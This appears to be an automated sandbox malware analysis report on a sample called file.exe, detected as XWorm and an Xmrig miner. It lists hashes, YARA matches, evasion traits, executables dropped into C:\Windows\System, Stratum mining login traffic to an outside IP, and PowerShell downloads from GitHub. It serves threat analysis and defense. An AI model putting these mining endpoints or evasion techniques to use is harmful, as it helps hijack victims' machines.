Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1522712
MD5:	011d87d169d7ba9f3d3fd9a7f6e4bf2d
SHA1:	d8b3f16c867541fb03f460a59042d17bbc20c0cf
SHA256:	1576f68ec71aa3b79d2f3ab363ee523951bde5da0d6afccc4a08247e48fd548b
Tags:	exex64user-jstrosch
Infos:

Detection

XWorm, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected XWorm

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Contains functionality to registers a callback to get notified when the system is suspended or resumed (often done by Miners)

Detected Stratum mining protocol

Drops executables to the windows directory (C:\Windows) and starts them

Found strings related to Crypto-Mining

Installs new ROOT certificates

Machine Learning detection for sample

Suspicious powershell command line found

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Communication To Uncommon Destination Ports

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 92%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 38.2.xNhRSWh.exe.7ff699c10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.MwFvbxc.exe.7ff7dc870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.oxCQuSo.exe.7ff6c9f90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.uxMRJKa.exe.7ff6bea80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.bzSbRdi.exe.7ff7777f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jtnQpnb.exe.7ff7a86e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.VHwkuIa.exe.7ff781ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.FGSooXz.exe.7ff654030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.imwRXsl.exe.7ff74df50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.wHnuprt.exe.7ff7c3b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.Csmwgyb.exe.7ff7b8680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.ZTSJHKb.exe.7ff725c00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ERbKWDm.exe.7ff67dbc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.nWSykjl.exe.7ff77c770000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.hEUEsIC.exe.7ff61c860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.wkazDeV.exe.7ff68b300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.vyHGCnK.exe.7ff6acaf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.UqXZtcb.exe.7ff7bbf70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.eVVPPqR.exe.7ff6e04e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.xIpouRJ.exe.7ff6667f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.WLWcTVM.exe.7ff6a8db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.tyQdqmC.exe.7ff60fc20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.wJNkgSa.exe.7ff700a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.mKdsHiQ.exe.7ff757760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.defQfgC.exe.7ff6888b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VWrcuzM.exe.7ff748320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.VFkciqc.exe.7ff602990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.XZxtJFw.exe.7ff7a5920000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.WCbcoxD.exe.7ff7b66f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.iHSYLud.exe.7ff7683d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.fpHmIIc.exe.7ff6377f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.QWtCxan.exe.7ff670a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.bJVoOik.exe.7ff6b3cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.hAOVVjq.exe.7ff77b680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.sabRErB.exe.7ff795f20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.LKurWpq.exe.7ff650b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.mbSqRHL.exe.7ff62c3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.sdTevgk.exe.7ff601280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.1388918384.00007FF670A01000.00000040.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1379197063.00007FF77B681000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1384505778.00007FF601281000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1388071664.00007FF7B66F1000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1377736700.00007FF7A5921000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1382318435.00007FF62C3E1000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1373040235.00007FF74DF51000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1402766893.00007FF699C11000.00000040.00000001.01000000.00000026.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1398506393.00007FF7683D1000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1391201441.00007FF757761000.00000040.00000001.01000000.0000001F.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1403370784.00007FF7A86E1000.00000040.00000001.01000000.00000027.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1380830249.00007FF6C9F91000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1378491789.00007FF7DC871000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1360369085.00007FF6BEA81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1358633550.00007FF6667F1000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1375621013.00007FF7B8681000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1390519266.00007FF654031000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1386016707.00007FF781EE1000.00000040.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1362487750.00007FF68B301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1374444194.00007FF7777F1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1381442489.00007FF6ACAF1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.1404441992.00007FF61C861000.00000040.00000001.01000000.00000028.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.1405348535.00007FF7BBF71000.00000040.00000001.01000000.00000029.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1387139413.00007FF6A8DB1000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1399335792.00007FF60FC21000.00000040.00000001.01000000.00000023.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1393351386.00007FF650B91000.00000040.00000001.01000000.00000021.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1361423571.00007FF6B3CD1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1366848753.00007FF700A71000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1358681117.00007FF67DBC1000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1359872361.00007FF7C3B51000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1363778887.00007FF748321000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1389418471.00007FF6377F1000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1385524896.00007FF6E04E1000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1401830291.00007FF725C01000.00000040.00000001.01000000.00000025.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1376866872.00007FF6888B1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1383583176.00007FF602991000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1400851952.00007FF795F21000.00000040.00000001.01000000.00000024.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1392692376.00007FF77C771000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xIpouRJ.exe PID: 1496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ERbKWDm.exe PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wHnuprt.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uxMRJKa.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bJVoOik.exe PID: 5648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkazDeV.exe PID: 6688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VWrcuzM.exe PID: 6052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wJNkgSa.exe PID: 6504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: imwRXsl.exe PID: 6048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bzSbRdi.exe PID: 6680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Csmwgyb.exe PID: 3232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: defQfgC.exe PID: 4504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XZxtJFw.exe PID: 1660, type: MEMORYSTR

Contains functionality to registers a callback to get notified when the system is suspended or resumed (often done by Miners)

Source: C:\Windows\System\xIpouRJ.exe	Code function: 4_2_00007FF66685EBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	4_2_00007FF66685EBF0
Source: C:\Windows\System\ERbKWDm.exe	Code function: 5_2_00007FF67DC2EBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	5_2_00007FF67DC2EBF0
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3BBEBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	6_2_00007FF7C3BBEBF0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAEEBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	7_2_00007FF6BEAEEBF0
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3D3EBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	8_2_00007FF6B3D3EBF0
Source: C:\Windows\System\wkazDeV.exe	Code function: 9_2_00007FF68B36EBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	9_2_00007FF68B36EBF0
Source: C:\Windows\System\VWrcuzM.exe	Code function: 10_2_00007FF74838EBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	10_2_00007FF74838EBF0

Detected Stratum mining protocol

Source: global traffic	TCP traffic: 192.168.2.7:49702 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49739 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49790 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49830 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49831 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49832 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49833 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49834 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49835 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49836 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49837 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.

Found strings related to Crypto-Mining

Source: xIpouRJ.exe	String found in binary or memory: stratum+tcp://
Source: xIpouRJ.exe	String found in binary or memory: cryptonight/0
Source: xIpouRJ.exe	String found in binary or memory: stratum+tcp://

Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49821 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.7:49702 -> 3.120.98.217:8080

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 140.82.121.4 140.82.121.4
Source: Joe Sandbox View	IP Address: 3.120.98.217 3.120.98.217
Source: Joe Sandbox View	IP Address: 185.199.111.133 185.199.111.133
Source: Joe Sandbox View	IP Address: 185.199.110.154 185.199.110.154

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: FASTLYUS FASTLYUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/dark-9c5b7a476542.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/light-3e154969b9f9.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/primer-primitives-4cf0d59ab51a.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/primer-fefb1a332c28.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/global-103ebe55f9d9.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/github-6da540aa3f84.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/dashboard-a70f6c490d6e.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/experiments-d77f07364a5f.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/site-fbd7cf8f6ba2.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/discussions-adf1d1b8b95c.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
